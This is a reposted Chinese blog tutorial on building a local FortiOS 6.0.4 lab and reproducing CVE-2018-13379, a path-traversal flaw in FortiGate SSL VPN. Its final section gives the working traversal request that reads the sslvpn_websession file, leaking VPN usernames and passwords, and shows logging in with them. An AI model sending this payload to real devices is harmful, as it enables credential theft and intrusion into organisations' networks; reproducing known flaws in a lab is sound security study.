ICode9
精准搜索请尝试: 精确搜索
首页
编程语言>
数据库
系统相关
互联网
其他分享
Python
Java
JavaScript
android
PHP
首页 > 其他分享> 文章详细

CVE-2018-13379 环境搭建+漏洞复现

2021-07-29 15:32:11  阅读:1066  来源: 互联网

标签:VPN ip 虚拟机 配置 SSL 2018 13379 CVE 10443


CVE-2018-13379 环境搭建+漏洞复现

在这里插入图片描述

在复现该漏洞时候,发现网上的文章很少有本地复现的,所以将该漏洞的复现过程和环境的搭建写成文章,方便自己温习,也方便大家参考。在环境配置过程中坑点较多,请仔细阅读。

文章中如有出现错误的地方,希望能够帮忙指出,谢谢大家。

一. 环境搭建

1.该漏洞影响的Fortigate版本为:

(FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 )

2.测试环境为:

Tested on: 6.0.4

3.FortiOS 6.0.4 环境下载地址:

点击下载
提取码为:srqc

4.修改环境配置:

(1)打开VM虚拟机依次选择—文件—打开—选择FortiGate-VM64.vapp.vmx。

在这里插入图片描述

(2)右键该虚拟机,将内存和Cpu,全部改为1,如果不进行修改将会出现LIcense过期的问题。

在这里插入图片描述

在这里插入图片描述

(3)开机—登录

Login:admin
Password:mima1234

在这里插入图片描述
(4) 登录成功后进行虚拟机的配置。(在配置过程中通过Tab键可以进行命令的补全)

show system interface  // 显示当前配置
config system interface  // 进入配置模式
edit port1             // 配置port1口
set mode static        //设置为静态 
set ip [IP] 255.255.255.0    
/* 设置ip和掩码  eg:set ip 192.168.120.66 255.255.255.0
   配置该 IP 的目的是要通过本地来进行访问 不要直接复制我的ip */
end            // 退出配置模式

(5) 登录web界面,账号密码同上。

坑点:
访问时不要使用https访问,要使用http,否则将出现如下页面。
在这里插入图片描述
在这里插入图片描述

(6)登录成功后进行wan口的配置。依次点击Network—Interfaces,然后出现画面如下。
在这里插入图片描述因为port2口是dhcp模式,所以会自动获取地址,这里看一下port2口有没有获取到IP地址,如果没有的话,通过刷新界面即可解决。

坑点:一定要记住port2的IP地址,因为等会要通过该链接来完成访问,其实本来这个SSL VPN 是需要去手动配置的,这里环境中给大家搭建好了,只需要刷新就可完成,具体的搭建过程,这里转载一篇不错的文章来给大家作为参考。
FortiGate SSL VPN 配置过程

(7)在刷新完成后,将虚拟机关闭,继续进行虚拟机的配置。

将内存和处理器全部设置回2,然后继续开机,然后进行web页面的访问。

坑点:
如果不进行配置的修改,该SSL VPN 隧道是无法访问的。

在这里插入图片描述
(8)配置一台和 Wan口,即Port2口在同一网段的虚拟机,对该虚拟机的10443端口进行访问,为什么是10443端口,因为该SSL VPN 里面设置时,监听的端口为 10443。
在这里插入图片描述

在这里插入图片描述
(9)用在同一网段的主机进行 SSL VPN的访问。

坑点:注意这次访问的时候必须使用https,不能使用http,因为是ssl隧道。
eg: https://192.168.220.134:10443/remote/login?lang=en
实际上只需要输入 https://192.168.220.134:10443 即可
在这里插入图片描述

二. 漏洞复现

POC:
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession

验证必备:
ip(SSL VPN 隧道的ip,本文为WAN口)
port(SSL VPN 的监听端口,本文为10443,常见的还有8443等端口)
POC

验证方式:
https://IP+port+POC

在这里插入图片描述

通过对该websession的查看
可知ssl vpn的一个账号密码为
login:test
Password:test

返回10443端口的登录界面,尝试通过泄露的账号密码登录 SSL VPN 隧道。

在这里插入图片描述**成功登录**

在这里插入图片描述

标签:VPN,ip,虚拟机,配置,SSL,2018,13379,CVE,10443
来源: https://blog.csdn.net/qq_42442326/article/details/119208981

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

关于我们 | 联系我们 | 留言反馈

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有